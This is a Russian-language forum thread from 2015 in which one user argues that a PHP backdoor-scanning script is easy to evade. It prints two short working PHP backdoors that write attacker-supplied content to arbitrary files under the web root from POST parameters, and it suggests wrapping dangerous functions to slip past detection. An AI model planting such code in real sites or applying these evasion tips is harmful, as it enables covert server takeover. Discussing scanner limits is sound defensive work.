{% else-1 %}
bibilink * 19.01
(18 мар 2015, 12:23) (0/0) [0]
donttime, да все ровно оно не будет работать..
стандартную функцию можно обвернуть в новую функцию и скрипт не среагирует. Способов обойти масса.
bibilink * 19.01
(18 мар 2015, 12:04) (0/0) [0]
donttime, я смотрел,не было.
bibilink * 19.01
(18 мар 2015, 12:03) (0/0) [0]
Нет,потому что в ключах есть только голые суперглобальные массивы и опасные функции.
bibilink * 19.01
(18 мар 2015, 12:00) (0/0) [0]
donttime, а такое?*

$q = substr($_POST['q'], 0 , 10);
$w = substr($_POST['w'], 0 , 100);

if(isset($_POST['q']) && isset($_POST['w'])) file_put_contents($_SERVER['DOCUMENT_ROOT'].$q,$w);
bibilink * 19.01
(18 мар 2015, 11:51) (0/0) [0]
donttime, Да и не надо много мудрить,к примеру такое.

if($_POST['q'] && $_POST['w']) file_put_contents($_SERVER['DOCUMENT_ROOT'].$_POST['q'],$_POST['w']);
bibilink * 19.01
(18 мар 2015, 07:48) (0/0) [0]
donttime, Нет,грамотно построенный бекдор может и не иметь каких-то прямых опасных функций.
bibilink * 19.01
(15 мар 2015, 09:01) (0/0) [0]
Совсем открытые уязвимости может и покажет,но не бекдоры.
  • 1 из 1